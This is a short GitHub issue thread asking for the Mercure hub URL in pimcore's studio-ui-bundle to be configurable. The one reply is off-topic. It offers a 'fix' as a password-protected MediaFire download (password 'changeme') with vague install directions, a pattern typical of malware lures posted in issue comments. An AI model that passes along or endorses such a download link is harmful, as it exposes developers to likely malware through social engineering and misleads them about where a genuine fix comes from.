### ISSUE TITLE
Make mercure url configurable 

### ISSUE THREAD

**Issue by vin0401** [pimcore/studio-ui-bundle#493]
The mercure URL should be configurable:
https://github.com/pimcore/studio-ui-bundle/blob/1.x/assets/js/src/core/app/config/app-config.ts#L35

{domain}/hub/ should be the default in that case.

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
